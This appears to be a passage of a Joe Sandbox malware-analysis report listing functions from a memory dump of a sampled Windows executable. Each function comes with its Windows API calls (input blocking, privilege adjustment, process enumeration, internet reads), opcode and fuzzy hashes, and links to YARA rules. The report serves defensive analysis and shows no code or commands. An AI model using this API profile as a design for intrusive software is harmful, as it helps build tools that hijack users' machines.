                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                          • API String ID: 2574300362-1355242751
                                                                                          • Opcode ID: f93d3ff0ce366ab95d7e6c8a1355595afc9dd02f208f5495b2fec8b10b31cda7
                                                                                          • Instruction ID: 495110f07c95f65f996084718c182e03a35f229d0d71507ebcbb000279891876
                                                                                          • Opcode Fuzzy Hash: f93d3ff0ce366ab95d7e6c8a1355595afc9dd02f208f5495b2fec8b10b31cda7
                                                                                          • Instruction Fuzzy Hash: E0E0C965D0DB0AC2EB15BB60E4183A463A0BB08B48FD40834DA9D46774FFBCD5948350
                                                                                          Function 00007FF74D0C6320 Relevance: 6.3, APIs: 4, Instructions: 255COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearInit$CopyCreateInitializeInstanceUninitialize
                                                                                          • String ID:
                                                                                          • API String ID: 2733932498-0
                                                                                          • Opcode ID: a09277b6a6935f26de9d5b61002aef5de2559b3d5eb22cd3cc7460a06f749bcb
                                                                                          • Instruction ID: 46657c9df40ceba00d4ce2149a19b7fae38f96c152326e2c4b20bc1b1b4bc4a3
                                                                                          • Opcode Fuzzy Hash: a09277b6a6935f26de9d5b61002aef5de2559b3d5eb22cd3cc7460a06f749bcb
                                                                                          • Instruction Fuzzy Hash: 1DB16C26B0DB56C2EB24FB26D4946ADA760EB48FD4F855036DE8D477B6DF38D4408320
                                                                                          Function 00007FF74D0CEB34 Relevance: 6.2, APIs: 4, Instructions: 156processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
                                                                                          • String ID:
                                                                                          • API String ID: 2000298826-0
                                                                                          • Opcode ID: 5b1cc7803f552fdfb6a5c1b64286c224a353268d24a72ba4bd1cd77bb81f450c
                                                                                          • Instruction ID: f7ff4e81ad93ae2b0e1fda112a34a04f40b79e109af16b6ffeccfd2da2017b86
                                                                                          • Opcode Fuzzy Hash: 5b1cc7803f552fdfb6a5c1b64286c224a353268d24a72ba4bd1cd77bb81f450c
                                                                                          • Instruction Fuzzy Hash: 30714C36A1CB41C6E700FB25E4447AEA7A0FB88B88F804136EA8D47B69EF7CD545C750
                                                                                          Function 00007FF74D0B6428 Relevance: 4.6, APIs: 3, Instructions: 116fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                          • String ID:
                                                                                          • API String ID: 3541575487-0
                                                                                          • Opcode ID: 8095db4ae0d7967ea6bb3d0986d3fec5b3e30099e78eeea076049f78ea6c2b13
                                                                                          • Instruction ID: 5e908fe9ada736eae2dfcbd7d3664e948811fccde6bb3242d624a18fd2cddaa5
                                                                                          • Opcode Fuzzy Hash: 8095db4ae0d7967ea6bb3d0986d3fec5b3e30099e78eeea076049f78ea6c2b13
                                                                                          • Instruction Fuzzy Hash: 71515832A0CA46C6DB14FF65E4943A8B760FB84B94F804232DA9E477A5EF7CE551C720
                                                                                          Function 00007FF74D09D5CC Relevance: 4.6, APIs: 3, Instructions: 59COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: AdjustConcurrency::cancel_current_taskErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                          • String ID:
                                                                                          • API String ID: 2278415577-0
                                                                                          • Opcode ID: 70c4773b18923e0c28b697d59e2b6e62826da89e857526a178f76e4b759ffcd8
                                                                                          • Instruction ID: d227fcfe253c58077ca163fdf9dbd5ce936865bfba94d4d13ad045250d195082
                                                                                          • Opcode Fuzzy Hash: 70c4773b18923e0c28b697d59e2b6e62826da89e857526a178f76e4b759ffcd8
                                                                                          • Instruction Fuzzy Hash: 1A219D7260CA85C5D714FF26E444269B7A1FB88B94F848439DE8C07728EF78D555C710
                                                                                          Function 00007FF74D09D540 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                          • String ID:
                                                                                          • API String ID: 3429775523-0
                                                                                          • Opcode ID: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                                                          • Instruction ID: aa08c421b866bf67609c4b1fe3793dfe137baeae4a487e19db936ef5cdd758cc
                                                                                          • Opcode Fuzzy Hash: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                                                          • Instruction Fuzzy Hash: EF014073628781CFE7209F20D4593AD73A0F75476EF400929F64986A99DB7DC258CB80
                                                                                          Function 00007FF74D09CDC4 Relevance: 4.5, APIs: 3, Instructions: 29memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocInitializeProcess
                                                                                          • String ID:
                                                                                          • API String ID: 570334035-0
                                                                                          • Opcode ID: c2212e710faa0aa25c6585764cd3283daba03b8e8a3efd7139333ad593dfd05c
                                                                                          • Instruction ID: 350e2df5e4fd8d9eab632d3e73e888e57b7d76c7aac2dfe5a3cc2b2c0c043c9e
                                                                                          • Opcode Fuzzy Hash: c2212e710faa0aa25c6585764cd3283daba03b8e8a3efd7139333ad593dfd05c
                                                                                          • Instruction Fuzzy Hash: 62F01236A1DB55C2D714EB56F04811EB3A0FB89B90B948534DF8943724EF3CD9548B80
                                                                                          Function 00007FF74D072F50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 110COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: .
                                                                                          • API String ID: 0-248832578
                                                                                          • Opcode ID: e1d1fb4f290d3f8f73012e05781d19b6c344ca2143228aded1dc3f30a5d54e4e
                                                                                          • Instruction ID: da4393af7fd023b8b6fb278aa0c0b4e925bd9f0065313a52f55ec4bdcbcca98b
                                                                                          • Opcode Fuzzy Hash: e1d1fb4f290d3f8f73012e05781d19b6c344ca2143228aded1dc3f30a5d54e4e
                                                                                          • Instruction Fuzzy Hash: DD315C51B1C691C4FB20BF72981467AE651FB50BE4F848631EEAD0BBE4EE3CD4014310
                                                                                          Function 00007FF74D092BA0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: LocalTime
                                                                                          • String ID: %.3d
                                                                                          • API String ID: 481472006-986655627
                                                                                          • Opcode ID: 0a1c5bb443c020c262df8418af2e2bd068d9f57d67344cb8eb19a51fac8e6ff3
                                                                                          • Instruction ID: da3e4c6339c8ffec8eb79b74c909ce0db5979c3d07c0a9b22676dd580b3847a4
                                                                                          • Opcode Fuzzy Hash: 0a1c5bb443c020c262df8418af2e2bd068d9f57d67344cb8eb19a51fac8e6ff3
                                                                                          • Instruction Fuzzy Hash: DED0E261A1C523D5EA10FF64E8555BEE332BB80714BD00072E98E028E8BF69E508E720
                                                                                          Function 00007FF74D0BE968 Relevance: 3.1, APIs: 2, Instructions: 97networkfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Internet$AvailableDataFileQueryRead
                                                                                          • String ID:
                                                                                          • API String ID: 599397726-0
                                                                                          • Opcode ID: a54c6d4a74e6411871131af3bdbcf589181ad988d0891215d2ce77e29c03cb3f
                                                                                          • Instruction ID: 70290684726a6dac31a680660fb10b060618b8934fdaae85424df84d1aad040f
                                                                                          • Opcode Fuzzy Hash: a54c6d4a74e6411871131af3bdbcf589181ad988d0891215d2ce77e29c03cb3f
                                                                                          • Instruction Fuzzy Hash: F131B236B0CA01C5FB58FE66D4507F9A7A5FB84B88F544435DE4D4BBA8EE78E4418310
                                                                                          Function 00007FF74D0B71F4 Relevance: 3.0, APIs: 2, Instructions: 47fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$CloseFileFirst
                                                                                          • String ID:
                                                                                          • API String ID: 2295610775-0
                                                                                          • Opcode ID: c9c219a70f1c370a867d1a9527945e6bdb48ca94d3a7acfc6404a472547bc866
                                                                                          • Instruction ID: 158895e934ee70e6948ea93fb71b10e96348746479017613d4f3d56128a02073
                                                                                          • Opcode Fuzzy Hash: c9c219a70f1c370a867d1a9527945e6bdb48ca94d3a7acfc6404a472547bc866
                                                                                          • Instruction Fuzzy Hash: 5D114C72B0CB81C2DB10EB66E184368B760FB88BA4F448631EBAD07BA5DF7CD4558750
                                                                                          Function 00007FF74D0B3778 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFormatLastMessage
                                                                                          • String ID:
                                                                                          • API String ID: 3479602957-0
                                                                                          • Opcode ID: a2008fc71fb315c0dad007a4b51d1fe3c27baf42b183b088b3737ee8cb1df6e2
                                                                                          • Instruction ID: b69f49a2c451cbab13df7d07b095a25cfb17fd0d6b46b1533169acfcabb621c0
                                                                                          • Opcode Fuzzy Hash: a2008fc71fb315c0dad007a4b51d1fe3c27baf42b183b088b3737ee8cb1df6e2
                                                                                          • Instruction Fuzzy Hash: 6EF0A46161C642C2E7207B16F40436EE2A5FFC8794F904234EBDD43BA9EE3CD4048B10
                                                                                          Function 00007FF74D09CCE0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                                                          • String ID:
                                                                                          • API String ID: 81990902-0
                                                                                          • Opcode ID: 2696843c0c1c48d019296e0beaf727179f08331fefa667d0a626b5bdda81ebd6
                                                                                          • Instruction ID: 8ad91efab5cebd0f64b367c128294bc3daa1da49a7e08b3c63331fe6f3015e53
                                                                                          • Opcode Fuzzy Hash: 2696843c0c1c48d019296e0beaf727179f08331fefa667d0a626b5bdda81ebd6
                                                                                          • Instruction Fuzzy Hash: BAF0E5A6A1CA45C2EB54FB21E4193B89360FBDCF88F640931CE8D07264DF7CC0868220
                                                                                          Function 00007FF74D0C0A00 Relevance: 1.5, APIs: 1, Instructions: 23keyboardCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: BlockInput
                                                                                          • String ID:
                                                                                          • API String ID: 3456056419-0
                                                                                          • Opcode ID: 8cf4d90d24b710f01b8413e09e10ab0a79a0cee39ea01687b76c1a24c8fffcac
                                                                                          • Instruction ID: 21adbea64b4d6dc226bd39313b676ed6f53c484d2b6c9dbd6fa2ea163471b59c
                                                                                          • Opcode Fuzzy Hash: 8cf4d90d24b710f01b8413e09e10ab0a79a0cee39ea01687b76c1a24c8fffcac
                                                                                          • Instruction Fuzzy Hash: 72E0653271C602C6EB44BB62E044279A290AB88F84F545035DE4D833A6EF7CD4908710
                                                                                          Function 00007FF74D092BCF Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: NameUser
                                                                                          • String ID:
                                                                                          • API String ID: 2645101109-0
                                                                                          • Opcode ID: 8585f7f64f3c872cdf94fb193dbdc54333e80748829e3d3e151e5918de675c21
                                                                                          • Instruction ID: d4a32103eaf89acb8389485fbabfa28c6974e840f46ae5d402cd42f2f240667c
                                                                                          • Opcode Fuzzy Hash: 8585f7f64f3c872cdf94fb193dbdc54333e80748829e3d3e151e5918de675c21
                                                                                          • Instruction Fuzzy Hash: 1AC0C961618652D9E760EF20D8885DC2331F700318FC00022E64A4B4A8AF789248C300
                                                                                          Function 00007FF74D06FD20 Relevance: .0, Instructions: 32COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                                                          • Instruction ID: 2dd02f379aeef3e1feb4816efb427c21b2abd2f4a7c494d553072152b69eb411
                                                                                          • Opcode Fuzzy Hash: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                                                          • Instruction Fuzzy Hash: 6AF04472B1C6568ADB94EF2CB442A2D7790E70C390F90803AD9C983E54DA3C90509F14
                                                                                          Function 00007FF74D0559C8 Relevance: .0, Instructions: 2COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
                                                                                          • Instruction ID: 8b17189afff58de27dcc3f3c37ec9809d3af99031ae51854a33c138fe2f1c7f2
                                                                                          • Opcode Fuzzy Hash: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
                                                                                          • Instruction Fuzzy Hash: 14A0022590EC06D4E608FF00E86C170A330EB55310BD20836D48D43471BF7CE480C320
                                                                                          Function 00007FF74D0DE95C Relevance: 49.7, APIs: 33, Instructions: 231windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                          • String ID:
                                                                                          • API String ID: 3521893082-0
